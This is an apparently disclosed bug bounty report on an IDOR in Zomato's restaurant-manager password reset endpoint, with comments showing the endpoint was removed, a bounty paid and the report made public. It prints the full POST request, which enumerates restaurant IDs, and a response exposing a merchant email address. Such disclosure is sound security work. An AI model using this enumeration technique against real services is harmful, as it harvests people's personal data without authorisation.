[www.zomato.com] Leaking Email Addresses of merchants via reset password feature
Summary by Zomato
Timeline
submitted a report to Zomato.
Hi Team,
Introduction
Found a cool IDOR, which again leaks the email addresses of all Zomato Users. This attack works no matter if you own the restaurant or not.
Proof of Concept
- Below Post Request leaks the email addresses of the Restaurant Owners in response -
Request
1POST /php/restaurant_manager_reset_password.php HTTP/1.1
2Host: www.zomato.com
3Connection: close
4Accept: application/json, text/javascript, */*; q=0.01
5X-Requested-With: XMLHttpRequest
6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
7Referer: https://www.zomato.com/
8Accept-Encoding: gzip, deflate
9Accept-Language: en-US,en;q=0.9
10Cookie: <Your Cookies HERE>
11Content-Type: application/x-www-form-urlencoded
12Content-Length: 10
13
14res_id=2100935
Response
1{"status":"success","message":"You will receive a recovery mail at ██████████@gmail.com, if it's in our database. Please check your inbox to start the password recovery process."}
- Now, testing with the restaurants against which I don't own (below snapshot), I purposely first found the restaurant which isn't active then I threw this request at that particular restaurant.
███████
- This means, this can help an attacker to extract millions of emails from Zomato's database. This would be a Huge Leak if an attacker gets an access to this POST REQUEST.
Best Regards,
Prateek Tiwari
Impact
Impact
This can allow an attacker to extract all the emails from the Zomato Database. A big leak. And we all know emails are of course the logins as well so this I would categorize as the huge leak considering the nature of the business.
posted a comment.
posted a comment.
Hi @shreysinha This is still vulnerable :( Any update on this issue? Considering the fact that user info disclosure @zomato cares a lot about this should be resolved by now atleast?
Looking forward to hear from you.
Best Regards,
Prateek Tiwari
posted a comment.
@shreysinha This is fixed now, while testing other issues out on the same endpoint, I now receive 404 Not Found error which means the dev team removed this endpoint itself.
Best Regards,
Prateek Tiwari
closed the report and changed the status to Resolved.
rewarded prateek_0490 with a bounty.
requested to disclose this report.
Hi Team, It's been quite some time since @zomato has done any public disclosures, thought would request few disclosures. Please see if you can do a full disclosure with some redaction (sensitive stuff if any), else I totally understand :)
Prateek
agreed to disclose this report.
This report has been disclosed.
changed the report title from [www.zomato.com] Leaking PIIs (All Email Addresses) Of All Zomato Users to [www.zomato.com] Leaking Email Addresses of merchants via reset password feature.
